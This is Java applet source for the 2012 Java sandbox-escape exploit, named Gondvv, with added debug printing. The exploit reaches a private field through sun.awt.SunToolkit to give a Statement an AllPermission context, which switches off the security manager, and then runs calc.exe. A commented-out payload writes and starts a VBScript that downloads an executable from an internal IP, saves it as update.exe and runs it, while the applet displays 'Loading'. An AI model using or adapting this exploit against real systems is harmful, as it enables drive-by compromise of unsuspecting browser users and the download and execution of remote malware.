package cve2012_java_0day;import java.applet.Applet;import java.awt.Graphi

1. package cve2012_java_0day;
2.  
3. import java.applet.Applet;
4. import java.awt.Graphics;
5. import java.beans.Expression;
6. import java.beans.Statement;
7. import java.lang.reflect.Field;
8. import java.net.URL;
9. import java.security.*;
10. import java.security.cert.Certificate;
11.  
12. public class Gondvv extends Applet
13. {
14.  
15.     public Gondvv()
16.     {
17.     }
18.  
19.     public void disableSecurity()
20.         throws Throwable
21.     {
22.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
23.         Permissions localPermissions = new Permissions();
24.         localPermissions.add(new AllPermission());
25.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
26.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
27.             localProtectionDomain
28.         });
29.         System.out.println("Statement.class:"+Statement.class);
30.         System.out.println("Statement.class.getDeclaredField('acc'):");
31.         System.out.println(Statement.class.getDeclaredField("acc"));
32.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
33.         localStatement.execute();
34.     }
35.  
36.     private Class GetClass(String paramString)
37.         throws Throwable
38.     {
39.         /*HELLOK*/
40.         /*
41.         Object arrayOfObject[] = new Object[1];
42.         arrayOfObject[0] = paramString;
43.         System.out.println("GetClass:");
44.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
45.         localExpression.execute();
46.        
47.         System.out.println("Class.class:"+Class.class);
48.         System.out.println("localExpression.getValue():"+localExpression.getValue());
49.         return (Class)localExpression.getValue();
50.        
51.         */
52.         Object t[] = new Object[1];
53.         t[0]=   Class.forName(paramString);    
54.         return (Class)t[0];
55.        
56.     }
57.  
58.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
59.         throws Throwable
60.     {
61.         Object arrayOfObject[] = new Object[2];
62.         //arrayOfObject[0] = paramClass; //java.beans.Statement
63.         arrayOfObject[0] = Statement.class; //java.beans.Statement
64.         arrayOfObject[1] = paramString;//acc
65.        
66.         System.out.println("GetClass('sun.awt.SunToolkit'):"+GetClass("sun.awt.SunToolkit"));
67.        
68.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
69.         localExpression.execute();//execute getField
70.         //Field field = klass.getDeclaredField(fieldName);//Field field="java.beans.Statement".getDeclaredField(acc);
71.         //field.setAccessible(true);                      //field.setAccessible(true);
72.        
73.         System.out.println("paramClass:"+paramClass);
74.         System.out.println("paramObject1:"+paramObject1);
75.         System.out.println("paramObject2:"+paramObject2);
76.         System.out.println("localExpression.getValue():"+localExpression.getValue());
77.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
78.     }
79.  
80.     public void init()
81.     {
82.         try
83.         {
84.            System.out.println("System.getSecurityManager():"+System.getSecurityManager());
85.            disableSecurity();
86.             Process localProcess = null;
87.            // String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " +
88.            // "& start d:\\apsou.vbs http://192.168.1.41/calc.exe d:\\windows\\update.exe";      
89.             String command="calc.exe";  
90.             localProcess = Runtime.getRuntime().exec(command);
91.             //C:\\Users\\hp\\workspace\\cve2012_java_0day\\src\\cve2012_java_0day\\calc.exe
92.             //calc.exe
93.             if(localProcess != null);
94.                localProcess.waitFor();
95.         }
96.         catch(Throwable localThrowable)
97.         {
98.             localThrowable.printStackTrace();
99.         }
100.     }
101.  
102.     public void paint(Graphics paramGraphics)
103.     {
104.         paramGraphics.drawString("Loading", 50, 25);
105.     }
106. }